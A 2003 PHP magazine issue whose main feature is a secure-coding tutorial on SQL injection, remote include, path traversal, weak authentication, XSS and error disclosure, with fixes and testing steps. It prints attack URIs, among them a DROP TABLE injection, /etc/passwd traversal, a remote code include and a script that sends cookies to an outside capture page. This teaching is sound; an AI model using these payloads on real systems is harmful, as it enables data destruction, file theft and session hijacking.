SEPTEMBER 2003
VOLUME II - ISSUE 9
The Magazine For PHP Professionals
Introduction to Bug Management Understand the need, the solutions, and the processes
Installing Java for PHP Demystify the beast
Creating a Reusable Menu System with XML and PHP
Advanced Database Features Exposed Come to terms with using the best tool for the job
Secure PHP
Using PHP's printer functions from Windows
Get Ready For php | Cruise See inside for details
Plus:
March 1st - March 5th 2004
Tips & Tricks, Product Reviews and much more...
Taking the key out of the lock
Printing with PHP
We’ve got you covered, from port to sockets.
php | Cruise
Port Canaveral • Coco Cay • Nassau
March 1st - March 5th 2004 Signup now and save $100.00! Hurry, space is limited.
Visit us at www.phparch.com/cruise for more details. Andrei Zmievski - Andrei's Regex Clinic, James Cox - XML for the Masses, Wez Furlong - Extending PHP, Stuart Herbert - Safe and Advanced Error Handling in PHP5, Peter James - mod_rewrite: From Zero to Hero, George Schlossnagle - Profiling PHP, Ilia Alshanetsky - Programming Web Services, John Coggeshall - Mastering PDFLib, Jason Sweat - Data Caching Techniques Plus: Stream socket programming, debugging techniques, writing high-performance code, data mining, PHP 101, safe and advanced error handling in PHP5, programming smarty, and much, much more!
FROM THE EXPERTS AT DEVELOPER’S LIBRARY...
Essential references for programming professionals
Elevate Your PHP with Advanced PHP Programming While there are many books on learning PHP and developing small applications with it, there is a serious lack of information on scaling PHP for large-scale, business-critical systems. Schlossnagle’s Advanced PHP Programming fills that void, demonstrating that PHP is ready for enterprise Web applications by showing the reader how to develop PHP-based applications for maximum performance, stability, and extensibility.
php|architect readers, get 40% off books in the Developer’s Library Visit www.developers-library.com and add the books of your choosing to your shopping cart. Upon check-out, enter the coupon code PHPARCH03 to receive discount. Offer valid through 12/31/03.
Advanced PHP Programming by George Schlossnagle ISBN: 0-672-32561-6 $49.99 US • 500 pages
MORE TITLES FROM DEVELOPER’S LIBRARY
PHP and MySQL Web Development, Second Edition by Luke Welling and Laura Thomson ISBN: 0-672-32525-X $49.99 US • 912 pages
PHP Developer’s Handbook by John Coggeshall ISBN: 0-672-32511-X $49.99 US • 800 pages
MySQL, Second Edition by Paul DuBois ISBN: 0-7357-1212-3 $49.99 US • 1248 pages
www.developers-library.com
TABLE OF CONTENTS
php|architect

Departments
EDITORIAL: From the front line
What’s New!
Product Review: Lumenation and LightBulb
Book Review: Core PHP Programming 3rd Edition
Tips & Tricks by John W. Holmes
Bits & Pieces: Real. Interesting. Stuff.
exit(0); Buy vs. Build by Marco Tabini

Features
Secure PHP Coding by David Jorm and Jody Melbourne
Introduction to Bug Management by Dejan Bosanac
Advanced Database Features Exposed by Davor Pleskina
Creating a Reusable Menu System with XML and PHP by Leon Vismer
Speaker on the High Seas by Marco Tabini
Printing with PHP by Alessandro Sfondrini
Installing Java for PHP by Dave Palmer

September 2003 · PHP Architect · www.phparch.com
NEW!
Existing subscribers can upgrade to the Print edition and save! Login to your account for more details.
Buy now and save $10 off the price of any subscription† Visit: http://www.phparch.com/print for more information or to subscribe online.
php|architect Subscription Dept. P.O. Box 3342 Markham, ON L3R 9Z4 Canada Name: Address: City: State/Province: ZIP/Postal Code: Country:
php|architect The Magazine For PHP Professionals
Your charge will appear under the name "Marco Tabini & Associates, Inc." Please allow up to 4 to 6 weeks for your subscription to be established and your first issue to be mailed to you. *US Pricing is approximate and for illustration purposes only.
Choose a Subscription type: Canada/USA $ 81.59 $67.99 CAD ($59.99 $49.99 US*) International Surface $108.99 $94.99 CAD ($79.99 $69.99 US*) International Air $122.99 $108.99 CAD ($89.99 $79.99 US*)
Payment type: VISA
Mastercard
Credit Card Number: Expiration Date: E-mail address: Phone Number:
American Express
Signature:
Date:
*By signing this order form, you agree that we will charge your account in Canadian dollars for the “CAD” amounts indicated above. Because of fluctuations in the exchange rates, the actual amount charged in your currency on your credit card statement may vary slightly. †Limited time offer extended to September 30th, 2003.
To subscribe via snail mail - please detach this form, fill it out and mail to the address above or fax to +1-416-630-5057
EDITORIAL
In the relatively short time that I’ve been with php|architect (about six months now), I’ve seen a lot of our magazine content cross my (very messy) desk. In that same time period, I’ve been committed to gobbling up any and all PHP content gracing the pages of other publications and developer sites. I now feel that I am qualified to state an opinion: We have great content. Our authors consistently dig deep into their topics, bringing you their practical experience, examples, and well-written explanations. Their enthusiasm for their articles shines through, and brings warmth and community to the pages of php|architect every month.

We constantly demand the best from our authors, and they, in turn, demand the best from us. The php|architect editorial team prides itself on being transparent, and I believe that authors enjoy writing for us because of it (maybe this helps explain why there are only two new authors and four return authors this month). By transparent, I mean that we are honest and up front with them, as well as ourselves. We view our authors as collaborators and team members, never as service providers or vendors. We are easy to work with, and are eager to bend over backward to help if we can see that an honest effort is being made. Through all of this we never compromise our integrity or settle for second best. Really, though, how could we? We serve one of the greatest software communities in the world!

This brings me to my next point. I am absolutely ecstatic to have been bestowed the honor of directing the editorial path of php|architect. Our authors, our readers, and our editorial team have all worked hard to build an excellent resource that brings you the best that the PHP world has to offer each and every month.

The hardest part of my new role here at php|a will probably be trying to fill Brian’s shoes – he’s got really big feet.* Brian has worked extremely hard to foster long-term relationships with our authors, and I will be working feverishly to continue to build and maintain that community, as well as various other initiatives on the front and back-end of the publication. But don’t worry, I’m still sleeping four hours a night.

I sincerely hope you enjoy this month’s issue. People lost hair, sleep, and teeth over it. And, as always, if you see anything you particularly like or don’t like in our magazine this month, I strongly encourage you to send us your feedback at
Volume II - Issue 9 September, 2003 Publisher Marco Tabini Editor-in-Chief Peter James
[email protected] Editor-at-Large Brian K. Jones
[email protected] Editorial Team Arbi Arzoumani Peter James Brian Jones Eddie Peloke Graphics & Layout Arbi Arzoumani, Hammed Malik, Marina Zlatogorov Managing Editor Emanuela Corso Director of Marketing J. Scott Johnson
[email protected] Account Executive Shelley Johnston
[email protected] Authors Dejan Bosanac, David Jorm, Dave Palmer, Davor Pleskina, Alessandro Sfondrini, Leon Vismer php|architect (ISSN 1705-1142) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box 3342, Markham, ON L3R 6G6, Canada. Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibility with regard to the use of the information contained herein or in all associated material.
Contact Information: General mailbox:
[email protected] Editorial:
[email protected] Subscriptions:
[email protected] Sales & advertising:
[email protected] Technical support:
[email protected] Copyright © 2002-2003 Marco Tabini & Associates, Inc. — All Rights Reserved
[email protected]. Even fan letters firmly stating that “You suck.” will be warmly accepted, as they help to break up the large amounts of spam that we all get from that address.
* Actually, I’ve never physically seen Brian, or Brian’s shoes... I’m pretty sure I can smell them, though.
php|a
When in Rome... Go to PHP Day 2003!
The first conference dedicated exclusively to the Italian PHP Community, called PHP Day 2003, will take place on October 24, 2003 in Rome at the Universita’ Tor Vergata. The program includes several speakers from the Italian technical community, and focuses on the theme of interface development, as well as a few tutorials to get the beginners up and running. Most of all, PHP Day revolves around the concept of providing the PHP community with an opportunity to meet and exchange their experiences. If you live in Italy, this is a great opportunity to meet your fellow PHP enthusiasts. If you don’t live in Italy... this might be the perfect excuse for that long-postponed vacation! For more information on PHP Day, visit http://www.phpday.it or mail the organizers at
[email protected].
NEW STUFF
What’s New!

PHP 4.3.3
PHP.net announced the release of PHP 4.3.3. This release contains a large number of bug fixes, and it is recommended that all users upgrade to this version. Changes include:
• Synchronized bundled GD Library with GD 2.0.15
• Upgraded the bundled Expat Library to version 1.95.6
• Improved the engine to use POSIX/socket IO where feasible
• and much more...
Visit php.net to download or view the change log.
Apache Cocoon 2.1
Apache Cocoon is a web development framework built around the concepts of separation of concerns (making sure people can interact and collaborate on a project without stepping on each other’s toes) and component-based web development. Cocoon implements these concepts around the notion of ‘component pipelines’, each component on the pipeline specializing in a particular operation. This makes it possible to use a Lego(tm)-like approach in building web solutions, hooking together components into pipelines without any required programming. Cocoon is “web glue for your web application development needs”. It is a glue that keeps concerns separate and allows parallel evolution of the two sides, improving development pace and reducing the chance of conflicts. Cocoon has a PHP Generator which is not included in the binary distribution but can be found at: cocoon.apache.org/2.1/userdocs/generators/php-generator.html
Get more information or download from the Cocoon Project Page: cocoon.apache.org/
PhpBB 2.0.6
The phpBB Group is pleased to announce the release of phpBB 2.0.6, the “phew, it’s way to hot to be furry” Edition. This release has been made to fix a number of potential security-related issues and more annoying bugs. Work continues on 2.2.0, and another 2.0.x release is not planned except where critical issues arise.
phpBB.com describes phpBB as: “...a high powered, fully scalable, and highly customisable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.”
phpBB strongly advises all users to upgrade. Get more information from phpBB.com.

ZEND Studio 3.0.0 Beta
Zend.com announced this month the release of the Zend Studio 3.0.0 Beta for Windows and Mac. The latest release includes:
• Code Profiler – Determine which scripts are slowing down your project so you can focus your time on improving their performance
• One-click debugging and profiling tool – Direct debugging and profiling of web pages from your browser
• Code Analyzer – Pinpoint messy code, allowing you to write cleaner, more correct code
• Highlight syntax errors – Write clean PHP code while you are typing
• Support for PHP 5.0 – Including syntax highlighting, code completion, file and project inspectors
• Dramatic performance improvements
• Code Completion improvements – Including improved speed, recognized constants, and a new function arguments view
...and much more.
Get more information or download from Zend.com.
Japha 1.3.3 The Japha site touts it as “An Expandable Implementation of Java in PHP”. From Japha: (japha.xzon.net/index.html) “Japha is an attempt to bring the main classes in the Java 1.4.1 (soon to be 1.4.2, time allowing) to PHP for use in everyday programs. We do this using the syntax that has been made common with the new releases of PHP 5. This allows us to easily implement interface, abstract classes, and more inheritance capabilities, not to mention excellent error handling and the ability to better conform with user-created data types.” Get more information or download the latest version from Japha.xzon.net
LightBulb 4.79 LightBulb (formerly EzSDK) is a PHP SDK which includes a PHP source code generator, a library of PHP Classes, and an application environment consisting of premade supporting modules. The modules handle user application and data access security, DB compatibility, a built-in GUI interface with an interactive desktop and more. Check out this month’s product review for more information. This release contains changes to the spell checking features. Spell checking of user data is now an inherent, interactive user option throughout the system. Developers are able to utilize the spell check features throughout every application developed without writing any source code to facilitate this. Get more information or view the demo at ezsdk.com
php|a
Secure PHP Coding
FEATURE
by David Jorm and Jody Melbourne

Web applications, by their very nature, have a broad exposure to remote attackers and a set of potential vulnerabilities as rich as the languages and protocols from which they are born. Web applications are handling an ever-growing list of business functions, and the code driving them must be paid due attention with regard not only to performance and stability, but also to security. This article is aimed at providing a concise listing and discussion of the most common vulnerabilities that exist in PHP web applications. This vulnerability listing is used at the end of the article as the basis for developing coding and code audit/testing methodologies which can be applied to any PHP web application. Note that, for the sake of brevity, only the most common and severe vulnerabilities have been listed and that vulnerabilities outside the scope of PHP code – such as those which may exist in a web server or PHP itself – are not covered by this article.
NOTE: All examples use the HTTP GET method so that attacks can be easily illustrated as URIs. Keep in mind that using POST is no defence; the variables are simply in the HTTP message body rather than the query string component of the URI. From a theoretical perspective, at least, POST variables are just as easy to manipulate as GET variables.
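The point of this note can be made concrete with a small sketch. It assumes PHP 7.1 or later, and the helper name `read_int_param` is hypothetical rather than anything taken from the article's listings. The same validation is applied whether the value arrived in the query string or in the message body, because neither source can be trusted.

```php
<?php
// Hypothetical helper (not from the article): fetch a parameter that must be
// a non-negative integer, from whichever request array it arrived in.
function read_int_param(array $input, string $name): ?int
{
    // Missing, or not a plain string (e.g. artid[]=1 arrives as an array).
    if (!isset($input[$name]) || !is_string($input[$name])) {
        return null;
    }
    // ctype_digit() accepts only non-empty strings made of the digits 0-9.
    if (!ctype_digit($input[$name])) {
        return null;
    }
    return (int) $input[$name];
}

// The same check applies to both methods; neither array is trustworthy.
$fromGet  = read_int_param($_GET, 'artid');
$fromPost = read_int_param($_POST, 'artid');
```

A caller would treat a `null` result as a rejected request rather than substituting a default, so that malformed input never reaches a query or a file path.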
REQUIREMENTS
PHP: 4.0+
OS: N/A
Applications: N/A
Code Directory: secure_php

SQL Injection

An SQL injection vulnerability can rear its ugly head when user-submitted variables are used to assemble SQL queries on the server side without sufficient input validation. The underlying SQL statement can be manipulated, or additional SQL statements injected, by an attacker. SQL injection is one of the most common web application vulnerabilities, but does not affect PHP code as much as other languages, mostly due to PHP’s automatic character escaping and built-in validation functions. A sample vulnerability is shown in Listing 1. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing1.php?artid=0%20or%20ArticleID%20%3C%3E%200

Note that the value being passed to artid is a urlencoded version of “0 or ArticleID <> 0”. Making a call to the link above would cause the following value to be assigned to $ssql and executed on the SQL server:

SELECT ArticleContents FROM Articles WHERE ArticleID = 0 OR ArticleID <> 0

Some database servers also allow multiple SQL statements to be concatenated using a semicolon (;) as a separator. In that case, the following attack could be used:

http://www.server.com/listing1.php?artid=0;%20DROP%20TABLE%20Articles

In this case, the urlencoded value being passed into artid is “0; DROP TABLE Articles”. You can imagine the problems that this might cause.

The key to protecting code against SQL injection attacks – also key for protecting against most web application vulnerabilities – is rigorous input validation. PHP can automatically escape some characters, such as apostrophes ('), providing protection against attacks involving those characters, but this is not sufficient immunity. All user-controlled variables used to construct SQL statements or other commands must be stripped of any content that may alter the effects of the query. For numeric inputs, either verify that the value is indeed numeric, or make it numeric using settype(). For non-numeric inputs, run the variable through addslashes() or addcslashes() before using it to construct a query. The vulnerable example above is patched in Listing 2. More information on patching against SQL injection is available at www.zend.com/manual/security.database.php.

In testing for SQL injection, the blackbox tester studies application inputs and attempts to insert special characters (such as commas, apostrophes, semicolons, quotation marks, and equal signs) or SQL keywords (AND, OR, SELECT, INSERT, etc). With many of the popular backends, informative error pages are displayed by default, which can often give clues to the underlying SQL query in use. For example, asking for

http://example.com/items.php?itemID=123'

instead of

http://example.com/items.php?itemID=123

could return a telltale error like this one:

mySQL error with query SELECT myitem FROM shop_item WHERE itemid=123';: You have an error in your SQL syntax near ''' at line 1
It is evident from this response that the value for itemID is being used directly (without any validation) within an SQL query.

PHP Code Injection

When user-defined inputs form the file path parameters used to call include(), fopen() or other similar functions, there are several possibilities for exploitation. The first, PHP code injection, is based on manipulating the input to include() to run your own PHP code. The second, path traversal, is based on manipulating the input to include() or fopen() to display files or create an open proxy. Note that both of these bugs rely on the same basic problem and overlap somewhat.

PHP code injection is similar to SQL injection, but involves native PHP code being injected by the user rather than SQL. This is made possible when the code makes use of the include() function. The include() function will accept a file name or URI (if the appropriate wrapper is installed) and include the contents of the resource as part of the PHP program. This is frequently used as a means of keeping libraries of code separate, and applications more modular,
calling include() to load needed functions at runtime or ‘on demand’, but it’s also frequently misused to include local text files, or worse, remote data from a URI. PHP code injection is achieved by placing malicious PHP code inside a resource which is run through include(), or finding a way to have the include() call load something unintended by the application developer. A sample vulnerability is shown in Listing 3. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing3.php?page=http://www.hacker.com/phpinjection.php

Making a call to the above link would cause the contents of www.hacker.com/phpinjection.php to be included into the program and executed locally. This page could output any malicious code the attacker can conjure up.

The primary strategy for defending against code injection attacks is to use include() appropriately. Having URI file wrappers enabled is generally a security liability, and if your site does not explicitly use them, they should be disabled. If it is necessary to have user manipulable variables run through include(), ensure that they are properly validated. Listing 3 is patched in Listing 4.

When trying to locate these vulnerabilities via blackbox testing, the tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this elicits a response from the application which might aid an attack. Imagine that a regular (non-malicious) URL looks like this:

http://example.com/main.php?in=links.inc

Let’s look at what we get if we change the query string a little, as follows:

http://example.com/main.php?in=../test.inc

The response from the application might be some telltale warnings, like so:

Warning: main(./../test.inc) [function.main]: failed to create stream: No such file or directory in main.php on line 102
Warning: main() [function.main]: Failed opening './../test.inc' for inclusion (include_path='.:') in main.php on line 102

This response indicates that the value of the ‘in’ variable is being used within an include() call. In this case, an attacker would be able to submit a request such as:

http://example.com/main.php?in=../../../../etc/passwd

to open (include) any readable file.

Path Traversal

Very closely related to PHP code injection is path traversal. Although Listing 4 protects against PHP code injection, it applies no input validation to the page GET variable, allowing the user to enter not just a file name but an absolute path. This can allow an attacker to view any file that the web server has permission to read. If URI wrappers were enabled, it would also allow an attacker to use the site as an open proxy to view
other resources on the web. A sample vulnerability is shown in Listing 5. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing5.php?page=../../../../../etc/passwd

Calling the above link might cause the contents of /etc/passwd to be returned to the attacker, which is obviously not what the script was supposed to do! If URI wrappers were enabled, the following attack could also be used:

http://www.server.com/listing5.php?page=http://www.phparch.com

This would cause the web server to source the contents of the URI www.phparch.com and return them to the attacker, effectively working as an open proxy. Oh, what we wouldn’t do for our daily dose of PHP goodness!

The key to defending against path traversal attacks is, once again, input validation. Ideally, all files that the script is serving can be numerically sequenced, requiring only a numeric input of the file number from the user. A patched version of Listing 5 using this method is shown in Listing 6. Alternatively, the page variable can be stripped of all characters which may allow a user to enter an absolute path or URI. A patched version of Listing 5 using this method is shown in Listing 7.

These vulnerabilities can often be located through blackbox testing of the application. The tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this returns (or attempts to return) arbitrary files. Imagine that a regular (non-malicious) URL looks like this:

http://example.com/viewfile.php?cat=users

To test for path traversal, we might use the following URLs:

http://example.com/viewfile.php?cat=/etc/motd
http://example.com/viewfile.php?cat=../../../../etc/passwd

If the tester receives a ‘File not found’ or ‘Cannot open’ error, it may simply be a matter of adjusting paths or increasing the number of traversal characters (../). fopen() and include() error messages are generally very informative in describing the error, and can give the tester all the information needed to correctly manipulate this request.

Trusted User Manipulable Values

A major problem with the web application environment and the advanced tools used within it, of which PHP is only one, is the fact that they hide the source of some inputs from the developer. For example, PHP will expose the contents of a form field, GET variable or POST variable indiscriminately as a variable with the same name as the field or HTTP variable. Developers come to rely on this feature and can fail to consider whether a trusted variable, such as the value of a product or name of a file, comes from a source which cannot be manipulated by an attacker.

The classic example is hidden form fields used to carry session-related variables, such as the name and value for products on an e-commerce site. The developer is relying on the notion that since he has set these values, he will read them back in from the subsequent form, unchanged. But when a form is submitted, the contents of the form fields are simply passed to the resource in the FORM tag’s ACTION attribute as either GET or POST variables, as specified by the METHOD attribute. An attacker can then change the price of products by making his own form carrying the desired values, or manipulating GET/POST variables.
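One way to avoid trusting a hidden price field is never to read it at all. The following is a minimal sketch, assuming PHP 7.1 or later; the `$catalogue` array, the field names `sku`, `qty` and `price`, and the function `order_total` are all hypothetical and stand in for whatever product store and form a real shop uses.

```php
<?php
// Hypothetical catalogue; in practice this would come from a database.
$catalogue = [
    'widget' => 1999, // prices in cents
    'gadget' => 4950,
];

// Compute the order total from server-side prices only. Any "price" field
// the client submits is deliberately ignored.
function order_total(array $catalogue, array $form): ?int
{
    $sku = isset($form['sku']) && is_string($form['sku']) ? $form['sku'] : '';
    $qty = isset($form['qty']) && is_string($form['qty']) ? $form['qty'] : '';

    // Unknown product or malformed quantity: refuse rather than guess.
    if (!array_key_exists($sku, $catalogue) || !ctype_digit($qty) || (int) $qty < 1) {
        return null;
    }
    return $catalogue[$sku] * (int) $qty;
}

// A tampered form claiming the widget costs 1 cent changes nothing.
$total = order_total($catalogue, ['sku' => 'widget', 'qty' => '2', 'price' => '1']);
```

The design choice here is that the form carries only identifiers and quantities, while anything with monetary meaning is looked up again on the server at the moment it is used.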
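Looking back at the two path traversal defences described earlier (numbering the files, or stripping dangerous characters), both can be sketched in a few lines. This assumes PHP 7.1 or later; the `$pages` map, the `.inc` naming rule, and the function names `resolve_page` and `safe_filename` are illustrative assumptions, not the contents of the article's own listings.

```php
<?php
// Hypothetical map from page numbers to files the script may serve.
$pages = [
    1 => 'home.inc',
    2 => 'links.inc',
    3 => 'contact.inc',
];

// Resolve a user-supplied page number to a file name, or null if invalid.
function resolve_page(array $pages, $requested): ?string
{
    // Only digit strings are accepted, so "../", "/" and "http://" never pass.
    if (!is_string($requested) || !ctype_digit($requested)) {
        return null;
    }
    $key = (int) $requested;
    return isset($pages[$key]) ? $pages[$key] : null;
}

// Fallback for when files cannot be numbered: keep only the final path
// component and allow a conservative character set ending in ".inc".
function safe_filename(string $requested): ?string
{
    $name = basename($requested);
    return preg_match('/^[A-Za-z0-9_-]+\.inc\z/', $name) === 1 ? $name : null;
}
```

The numbered approach is the stricter of the two, since the user never supplies any part of a path. The stripping approach silently reduces `../test.inc` to `test.inc`, which is safe only if every file in the served directory is meant to be public.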
Weak Authentication

Despite the widespread gospel that clear-text authentication credentials are a cardinal sin and that passwords should conform to minimum complexity rules, these fundamentals of secure programming are frequently not applied in the web application world. HTTP includes two standard authentication mechanisms: basic and digest. Both mechanisms operate as a series of HTTP exchanges with a demand for authentication issued by the server in an HTTP header, followed by a repeated request from the client, including authentication credentials in another HTTP header. The primary difference is that basic authentication sends the credentials in clear text, merely base64 encoded, while digest sends a hash of the credentials combined with a nonce (a time-sensitive value) issued by the server.

Basic authentication can be set up easily by using PHP’s header() function to issue the required header. The $_SERVER['PHP_AUTH_USER'] and $_SERVER['PHP_AUTH_PW'] variables are created by PHP when a request has included authentication credentials. This is, unfortunately, promoted by many tutorials on PHP programming. The main alternative to basic HTTP authentication is to have a custom solution where a session id or cookie is issued to the client once it has successfully authenticated, this token then being checked with each subsequent request for a protected resource. This relies on the developer correctly enforcing password complexity rules and is vulnerable to replay attacks. A sample vulnerability is shown in Listing 13 (allowing a weak password to be set) and 14 (doing effectively clear-text authentication).

Lack of complexity rules can make you vulnerable to brute force attacks, because with short and common passwords little key space will need to be exhausted before an attacker finds his way in. Brute force attacks most commonly work either from a dictionary file of common words, or in an incremental mode trying every possible string. Sometimes a hybrid of the two is used, attaching short incremental suffixes and prefixes to common words. Listing 15 is an example of an incremental-mode brute-forcing tool.

Basic HTTP authentication is vulnerable only to third party attack, where an attacker is sniffing or otherwise intercepting the site’s communication and extracting the clear text authentication credentials. No sample attack is provided for extracting clear text credentials.

There is no patch, as such, for the use of basic
HTTP authentication. The point was merely to illustrate that its use, without SSL or some other form of encryption, is a security liability. Password complexity rules, however, can be applied in a variety of ways. PHP functions are available to utilise the CrackLib library to check the strength of passwords. The strength is determined by length, use of upper and lower case and dictionary checks. If CrackLib is not available or you wish to enforce custom business rules for password strength, writing your own implementation is simple. Listing 13 is patched using a custom password strength test in Listing 16.

To identify these vulnerabilities, the blackbox tester must first identify the authentication method in use. If basic HTTP authentication is
being used, the tester can attempt to brute-force a valid login and password pair – in most cases, account lockout restrictions are not enforced. There are many tools available online to test the strength of basic HTTP authentication. One of the more popular password cracking tools is Cain&Abel, available from http://www.oxid.it/cain.html

Poorly-Applied Authentication

Authentication mechanisms can sometimes fail to cover every access method for a resource and restrict access accordingly. The classic example is a menu driven by permissions associated with authentication credentials providing access to a list of resources the user is allowed to view. The resources themselves, however, do not require authentication credentials and rely on the notion that they are hidden unless access to them is provided via a menu. This is security through obscurity, and is a major flaw. A recent high-profile example of this problem is an Australian Taxation Office site where a user provided detailed credentials to authenticate their identity and was then allowed to view details associated with their Tax File Number. The page providing this access simply accepted the Tax File Number as a GET variable, such as:

http://www.ato.gov.au/viewtfn.php?tfn=231897
An attacker could simply plug in another TFN to view its details:

http://www.ato.gov.au/viewtfn.php?tfn=999999
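The missing step in a case like this is a check, made at the resource itself, that the requested record belongs to the authenticated user. The sketch below is illustrative only and assumes PHP 7.1 or later; the `$ownedTfns` table, the account names, and the function `may_view_tfn` are hypothetical and say nothing about how the real site was built.

```php
<?php
// Hypothetical lookup of which tax file numbers each account may view;
// a real system would query its own user store.
$ownedTfns = [
    'alice' => ['231897'],
    'bob'   => ['999999'],
];

// Decide whether the authenticated user may view the requested TFN.
// $sessionUser must come from server-side session state, never the request.
function may_view_tfn(array $ownedTfns, ?string $sessionUser, $requestedTfn): bool
{
    if ($sessionUser === null || !isset($ownedTfns[$sessionUser])) {
        return false; // not logged in, or unknown account
    }
    if (!is_string($requestedTfn) || !ctype_digit($requestedTfn)) {
        return false; // malformed parameter
    }
    // Strict comparison avoids loose string/number matching.
    return in_array($requestedTfn, $ownedTfns[$sessionUser], true);
}
```

With a check of this kind in the page that serves the record, changing the tfn value in the URI yields a refusal instead of someone else's details.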
A sample vulnerability is shown in Listings 17 (the menu) and 18 (the resource). A sample attack on that vulnerability might look like the following:

http://www.server.com/listing18.php?res=1
By accessing the above URI, an attacker can bypass the authentication applied by Listing 17, and go straight to the resource (Listing 18) it was designed to provide access to.

The best strategy to avoid these kinds of problems is to apply authentication at every individual resource, so it can never be bypassed. In the production world, your authentication would never be as simple as the ‘if’ test used in Listing 17, so a convenient technique is to create an authentication class and include it with every resource. These vulnerabilities are patched by Listings 19 (the authentication class) and 20 (the protected resource).

Authentication and logic flaws in applications can sometimes be located via blackbox testing methods. The tester, using valid credentials, authenticates to the application and interacts as a normal user. At every point beyond the initial authentication routine, the tester locates any GET and POST variables, manipulates them using valid data, and examines the output. Imagine that a regular (non-malicious) URI looks like this:

http://example.com/members/index.php?startpg=10167&lang=en
A blackbox tester might try the following:

http://example.com/members/index.php?startpg=10169&lang=en

In the above example, the user might expect to receive an ‘unauthorized’ error message when attempting to submit an alternate ‘startpg’ variable. If authentication has only been applied to the application portal page (and subsequent requests are not being re-authenticated), an attacker may be able to request arbitrary start pages.

Cross-Site Scripting

Many sites, such as message forums, allow a user to enter content and post it to the site. This is usually handled using an SQL database to store messages and PHP code to add and render posts on demand. If HTML tags and Javascript code are not stripped from the contents of these messages, an attacker can effectively inject client-side scripts which will be run under the security context of the message forum. This vulnerability, however, is not limited to message forums. Any site where the contents of user-defined variables such as GET/POST variables, HTTP headers or cookies will form part of the page returned can be vulnerable to cross-site scripting, or XSS.

As an example of XSS outside of a classic message forum, consider a URI on ninemsn.com.au whose GET variable carries a script such as <script>alert(document.cookie);</script>. This will run the Javascript code alert(document.cookie); within the security context the user has set for ninemsn.com.au, exposing the user’s cookie for the site. On a message board this could well include a session id token which could be replayed to hijack their session. The cookie could then be logged to a remote capture application using Javascript code such as:

<script>window.open('http://www.server.com/capture.php?cookie=' + document.cookie);</script>

A sample vulnerability is shown in Listing 21. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing21.php?query=%3Cscript%3Efor+%28i%3D0%3B+i%3C100%3B+i%2B%2B%29+%7B+window.open%28%27http%3A%2F%2Fwww.porn.com%2F%27%29%3B%7D+%3C%2Fscript%3E

This would cause the “query” GET variable to contain:

<script>for (i=0; i<100; i++) { window.open('http://www.porn.com/');} </script>
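To check what the server actually receives from the sample attack URI, the query string can be decoded by hand. The sketch below is only an illustration: it uses PHP's `parse_str()` as a stand-in for the decoding PHP performs when it fills `$_GET`, and then shows how `htmlspecialchars()` renders the same value harmless on output. The variable names are arbitrary.

```php
<?php
// Query string taken from the sample attack URI in the text.
$queryString = 'query=%3Cscript%3Efor+%28i%3D0%3B+i%3C100%3B+i%2B%2B%29+%7B+'
    . 'window.open%28%27http%3A%2F%2Fwww.porn.com%2F%27%29%3B%7D+%3C%2Fscript%3E';

// parse_str() URL-decodes names and values, much as PHP does for $_GET.
parse_str($queryString, $vars);
$raw = $vars['query'];

// Escaping on output turns markup characters into harmless entities.
$escaped = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');

echo $raw, "\n";      // the script tag as the attacker wrote it
echo $escaped, "\n";  // the same text with <, > and quotes as entities
```

Echoing `$raw` into a page would hand the browser a live script tag, whereas `$escaped` is displayed as plain text.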
...functionality of the site. A better strategy is to parse user-defined inputs after they have been used by the PHP script, but before they are returned as part of the response, to replace ‘<’ and ‘>’ characters with ‘&lt;’ and ‘&gt;’ respectively. This will prevent ‘<script>’ or other tags from being injected. Listing 21 is patched using this technique in Listing 22.

Cross-site scripting vulnerabilities are generally quite easy to locate using blackbox testing methods. The tester examines all GET and POST variables to determine if any of these values are being returned within page outputs. In the example below, the tester can safely assume that the contents of the Title variable will be used somewhere within the returned page. Imagine that a regular (non-malicious) URI looks like this:

http://example.com/index.php?articleID=1234&Title=Annual%20Report

The tester inserts HTML special characters (such as < and >) into the Title variable and resubmits the request.

http://example.com/index.php?articleID=1234&Title=TESTING

If the injected HTML can be found within the returned page, then this application is vulnerable to cross-site scripting. In this case, if the Title value is being used directly between a pair of HTML tags (for example <title> and </title>), without filtering of < and > characters, additional HTML and Javascript can be injected into the returned page.

Environment Information Disclosure

By default, PHP displays all warnings and errors. These frequently contain verbose information pertaining to the operating environment, such as file paths, database credentials and configuration details. A sample vulnerability is shown in Listing 23. A sample attack on that vulnerability might look like the following:

http://www.server.com/listing23.php

If an attacker runs the above URI when the database server is down and /mnt/data/file1.txt is not available, the following errors (with HTML removed) will be given by PHP:

Warning: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
Warning: fopen(“/mnt/data/file1.txt”, “rb”) - No such file or directory in C:\PHP\phparch\env.php on line 3

This discloses both the name of the database server and the path from which the script is reading files. Although this does not open the site to any specific attack, it is not good security practice to disclose this kind of information. The best strategy to prevent this is to disable error reporting on production sites and reserve it for development use. This is best implemented in php.ini but is illustrated using the error_reporting() function in Listing 24.

The blackbox tester inserts special characters into all identified GET and POST variables in an attempt to elicit exception conditions from the application. Errors from failed include(), popen(), fopen() and DB-related calls can be extremely informative and may assist the tester in identifying further vulnerabilities. Imagine that a regular (non-malicious) URI looks like this:

http://example.com/index.php?articleID=1234
After the tester submits a manipulated articleID value, the server’s response could be as follows:

Warning: Supplied argument is not a valid MySQL-Link resource in /www.example.com/cgi-bin/index.php on line 46
Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘sql.example.com’ (2) in /www.example.com/cgi-bin/index.php on line 45
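The advice above, keeping error details away from visitors on production sites, can be sketched at runtime as follows. This is a variant of the approach rather than a copy of Listing 24: instead of switching reporting off with error_reporting(), it keeps errors recorded in a log while hiding them from the browser. The function name and the log file location are assumptions made for the example; the same settings could equally be placed in php.ini.

```php
<?php
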